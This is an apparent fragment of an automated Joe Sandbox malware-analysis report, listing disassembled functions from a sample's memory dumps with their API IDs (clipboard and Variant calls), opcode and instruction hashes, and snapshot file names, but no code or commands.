                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                    Function 024CC79B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                    • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                    Function 024B559D Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                    • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                                    Function 024C1337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                    • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                    • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                    • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                    • Instruction ID: 1209ac60c52be1ee3d2609d382f462b43dac307b6badfe25585f3bede4718c51
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61418E7050C7818FD341AF7C988836FBEE09F86314F084A7EE4DA86392D6788549C797
                                                                                                                                                                                                                                                                    Function 004310D0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                    • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                    • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                    • Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                    • Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
                                                                                                                                                                                                                                                                    Function 024BFAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433977170.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_2490000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                    • String ID: L
                                                                                                                                                                                                                                                                    • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                    • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction ID: 3ad9b868c03ac49d6ff77bb70abfbb19bf88551a758c6b1064517cd83c371392
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF412B7110CBC18ED321DB38845869EBFD16FE6220F188A9DE5F5873E2D674854ACB53
                                                                                                                                                                                                                                                                    Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                    • String ID: L
                                                                                                                                                                                                                                                                    • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                    • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                                    Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2433138560.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2433138560.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_1A68.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MetricsSystem
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                    • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                    • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86